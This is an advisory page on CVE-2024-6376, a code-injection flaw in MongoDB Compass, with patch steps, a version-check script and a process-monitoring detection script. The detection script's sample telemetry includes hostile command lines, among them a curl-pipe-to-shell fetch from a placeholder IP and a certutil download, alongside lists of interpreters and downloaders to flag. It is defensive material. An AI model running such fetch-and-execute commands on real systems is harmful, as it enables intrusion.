CVE-2024-6376
📋 TL;DR
MongoDB Compass versions before 1.42.2 evaluate connection input with an ejson shell parser whose sandbox is insufficiently protected, so crafted input reaching the parser can inject code that runs inside the Compass process with the privileges of the user who launched it. MongoDB Compass is the official GUI for browsing and managing MongoDB databases, so the exposed population is developers and administrators running an unpatched desktop install. Exploitation needs a victim to load attacker-controlled connection data; it is not reachable over the network without that interaction.
💻 Affected Systems
- MongoDB Compass, all versions prior to 1.42.2, on Windows, macOS and Linux
📦 What is this software?
MongoDB Compass, by MongoDB Inc.: the vendor's Electron-based desktop GUI for connecting to MongoDB deployments, browsing collections, building queries and aggregations, and inspecting schemas and indexes.
⚠️ Risk & Real-World Impact
Worst Case
Arbitrary code execution with the privileges of the user running Compass, triggered by tricking that user into loading a crafted connection string. Because Compass users typically hold database credentials and often local admin rights on their workstation, this can lead to credential theft, data exfiltration from the connected deployments, persistence on the workstation, and lateral movement within the network.
Likely Case
Code execution in the Compass process when a user opens a connection string obtained from an untrusted source (pasted from a ticket, chat message, e-mail or shared configuration). The injected code runs as the Compass user; it yields persistence at that privilege level and, only where Compass itself runs with elevated rights, privilege escalation.
If Mitigated
Limited impact if Compass runs as an unprivileged user on a workstation with restricted outbound network access and scoped database credentials, though code execution within the Compass process, and access to whatever that process can reach, remains possible until the patch is applied.
🎯 Exploit Status
Exploitation requires user interaction: a victim must feed attacker-controlled input into Compass's connection handling, for example by pasting or importing a crafted connection string. No public exploit code was known at the time of writing.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.42.2
Vendor Advisory: https://jira.mongodb.org/browse/COMPASS-7496
Restart Required: Yes
Instructions:
1. Download MongoDB Compass version 1.42.2 or later from the official MongoDB website (or via the package manager used for the original install on Linux).
2. Uninstall the previous version.
3. Install the updated version.
4. Restart the application and confirm the new version in Help → About.
🔧 Temporary Workarounds
Restrict Compass Usage
Limit use of MongoDB Compass to trusted environments and do not open connection strings received from untrusted sources; type connection details into the form fields yourself rather than pasting a string you did not author.
Run with Limited Privileges
Run MongoDB Compass as an unprivileged user (never as an administrator or root) so that any injected code is confined to that account's permissions.
🧯 If You Can't Patch
- Discontinue use of vulnerable Compass installs and use an alternative MongoDB client (such as mongosh) until an update is possible
- Treat connection strings as untrusted input: only load strings you have composed or reviewed yourself, and do not import saved connections or strings from tickets, chat, e-mail or shared documents into an unpatched Compass
🔍 How to Verify
Check if Vulnerable:
Check the Compass version in the Help → About menu. Any version below 1.42.2 is vulnerable; note that 1.42.10 would be newer than 1.42.2, so compare the numeric components, not the strings.
Check Version:
The GUI Help → About menu is authoritative. For fleet-wide checks without opening the GUI, the version is also visible in the installed package metadata: the Linux package is named mongodb-compass (query it with dpkg or rpm), the macOS bundle records CFBundleShortVersionString in its Info.plist, and Windows lists the version under Apps & Features.
Verify Fix Applied:
After updating, verify version shows 1.42.2 or higher in Help → About menu.
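The following script is an added example (not MongoDB's own tooling) that automates the check above for a fleet: it compares a Compass version string against 1.42.2 with numeric, component-wise comparison, and makes a best-effort attempt to read the locally installed version. The Linux package name, the macOS bundle path and the Windows uninstall-registry lookup are assumptions about a default install; where the lookup fails the script tells you to fall back to Help → About.

```python
"""Check whether an installed MongoDB Compass is older than the fixed
release 1.42.2 (CVE-2024-6376). Added example, not MongoDB's own code.
Package names and install locations below are assumptions about a
default install; the Help -> About dialog remains the authoritative check."""
import platform
import re
import subprocess

FIXED_VERSION = (1, 42, 2)


def parse_version(text):
    """Turn '1.42.2', 'v1.42.2' or '1.43.0-beta.1' into a comparable tuple.
    A pre-release suffix is dropped, so 1.43.0-beta.1 compares as 1.43.0;
    tighten this if you need beta builds flagged separately."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised Compass version string: {text!r}")
    return tuple(int(p) for p in m.groups())


def is_vulnerable(version_text):
    """True when the version is below 1.42.2. Tuple comparison avoids the
    string-compare mistake where '1.42.10' would sort before '1.42.2'."""
    return parse_version(version_text) < FIXED_VERSION


def _run(cmd):
    """Run a command and return its trimmed stdout, or None on any failure."""
    try:
        out = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.SubprocessError):
        return None
    text = out.stdout.strip()
    return text if out.returncode == 0 and text else None


def installed_version():
    """Best-effort lookup of the locally installed Compass version.
    Returns None when nothing is found; fall back to Help -> About."""
    system = platform.system()
    if system == "Linux":
        # Assumed package name of the official .deb/.rpm: mongodb-compass
        return (_run(["dpkg-query", "-W", "--showformat=${Version}", "mongodb-compass"])
                or _run(["rpm", "-q", "--qf", "%{VERSION}", "mongodb-compass"]))
    if system == "Darwin":
        # Assumed default bundle path
        plist = "/Applications/MongoDB Compass.app/Contents/Info.plist"
        return _run(["defaults", "read", plist, "CFBundleShortVersionString"])
    if system == "Windows":
        # Assumed: the installer registers a per-user uninstall entry
        ps = ("Get-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* "
              "| Where-Object DisplayName -like 'MongoDB Compass*' "
              "| Select-Object -ExpandProperty DisplayVersion -First 1")
        return _run(["powershell", "-NoProfile", "-Command", ps])
    return None


if __name__ == "__main__":
    found = installed_version()
    if found is None:
        print("Compass version not found automatically; check Help -> About.")
    else:
        status = "VULNERABLE, update to 1.42.2 or later" if is_vulnerable(found) else "patched"
        print(f"MongoDB Compass {found}: {status}")
```

Run it on each workstation (or push it through your endpoint management tool) and collect the output; any "VULNERABLE" line identifies a host that still needs the 1.42.2 update.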
📡 Detection & Monitoring
Log Indicators:
- Child processes spawned by the Compass executable (MongoDBCompass.exe on Windows, mongodb-compass on Linux, MongoDB Compass on macOS) other than copies of itself, which Electron creates for renderer and helper processes; shells and script interpreters as children are the strongest signal
- Connection-string parsing failures in Compass's own application log, which may indicate probing with malformed input
Network Indicators:
- Outbound connections from the Compass process, or from its child processes, to destinations other than the MongoDB deployments the user normally connects to (Compass itself should only talk to MongoDB hosts and its update endpoint)
SIEM Query (generic Lucene-style field names; map them to your EDR or Sysmon schema, and exclude children whose image equals the parent image, since Electron forks copies of itself):
parent_process_name:("MongoDBCompass.exe" OR "mongodb-compass" OR "MongoDB Compass") AND process_name:("cmd.exe" OR "powershell.exe" OR "pwsh.exe" OR "wscript.exe" OR "cscript.exe" OR "mshta.exe" OR "sh" OR "bash" OR "zsh" OR "osascript")
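The detection logic behind the process indicators above, as an added example that is not part of the original advisory or any vendor's tooling: it walks Sysmon-style process-creation events (fields Image, ParentImage, CommandLine, User), ignores the children an Electron app legitimately spawns, and ranks the rest. The Compass executable names and the crashpad_handler allowlist are assumptions about a normal install, and the sample events are constructed, not real telemetry.

```python
"""Hunt for child processes spawned by MongoDB Compass, the observable side
effect of code injection through its connection handling (CVE-2024-6376).
Added example, not MongoDB's or any vendor's code. Field names follow Sysmon
Event ID 1 (Image, ParentImage, CommandLine, User); map them to your EDR's
schema. Process names and the expected-children list are assumptions."""
import json
import ntpath
import posixpath

# Assumed executable names of Compass on Windows, Linux and macOS.
COMPASS_IMAGES = {"mongodbcompass.exe", "mongodb-compass", "mongodb compass"}

# Electron apps legitimately fork copies of themselves (renderer, GPU,
# utility processes) and a crash reporter; everything else is unexpected.
EXPECTED_CHILDREN = {"crashpad_handler", "crashpad_handler.exe"}

# Interpreters and downloaders an injected payload would most likely reach for.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "sh", "bash",
                "zsh", "osascript", "python", "python3", "node", "curl", "wget"}


def basename(path):
    """Last path component for either Windows or POSIX paths, lower-cased."""
    return ntpath.basename(posixpath.basename(path)).lower()


def classify(event):
    """Return (severity, reason) for one process-creation event, or None when
    the parent is not Compass or the child is an expected Electron helper."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in COMPASS_IMAGES:
        return None
    if child == parent or child in EXPECTED_CHILDREN:
        return None
    if child in INTERPRETERS:
        return ("high", f"Compass spawned interpreter {child}")
    return ("medium", f"Compass spawned unexpected child {child}")


def suspicious_children(events):
    """Run classify() over an iterable of event dicts and return the hits."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict:
            severity, reason = verdict
            hits.append({"severity": severity, "reason": reason,
                         "command": ev.get("CommandLine", ""),
                         "user": ev.get("User", "")})
    return hits


# Constructed sample events (not real telemetry), one JSON object per line.
SAMPLE_EVENTS = [json.loads(line) for line in r"""
{"ParentImage":"C:\\Users\\dev\\AppData\\Local\\MongoDBCompass\\MongoDBCompass.exe","Image":"C:\\Users\\dev\\AppData\\Local\\MongoDBCompass\\MongoDBCompass.exe","CommandLine":"MongoDBCompass.exe --type=renderer","User":"CORP\\dev"}
{"ParentImage":"C:\\Users\\dev\\AppData\\Local\\MongoDBCompass\\MongoDBCompass.exe","Image":"C:\\Users\\dev\\AppData\\Local\\MongoDBCompass\\crashpad_handler.exe","CommandLine":"crashpad_handler.exe --no-rate-limit","User":"CORP\\dev"}
{"ParentImage":"C:\\Users\\dev\\AppData\\Local\\MongoDBCompass\\MongoDBCompass.exe","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c whoami > C:\\Users\\Public\\out.txt","User":"CORP\\dev"}
{"ParentImage":"/usr/lib/mongodb-compass/mongodb-compass","Image":"/bin/sh","CommandLine":"sh -c \"curl -s http://203.0.113.10/s | sh\"","User":"dev"}
{"ParentImage":"C:\\Users\\dev\\AppData\\Local\\MongoDBCompass\\MongoDBCompass.exe","Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil -urlcache -f http://203.0.113.10/a.txt a.txt","User":"CORP\\dev"}
{"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Users\\dev\\AppData\\Local\\MongoDBCompass\\MongoDBCompass.exe","CommandLine":"MongoDBCompass.exe","User":"CORP\\dev"}
""".strip().splitlines()]


if __name__ == "__main__":
    for hit in suspicious_children(SAMPLE_EVENTS):
        print(f"[{hit['severity']}] {hit['reason']} ({hit['user']}): {hit['command']}")
```

Against the constructed events the two Electron helpers and the unrelated explorer.exe launch are ignored, the cmd.exe and sh children are reported as high severity, and certutil.exe is reported as medium; the medium tier is where you tune out any site-specific helpers Compass legitimately launches before turning the rule into an alert.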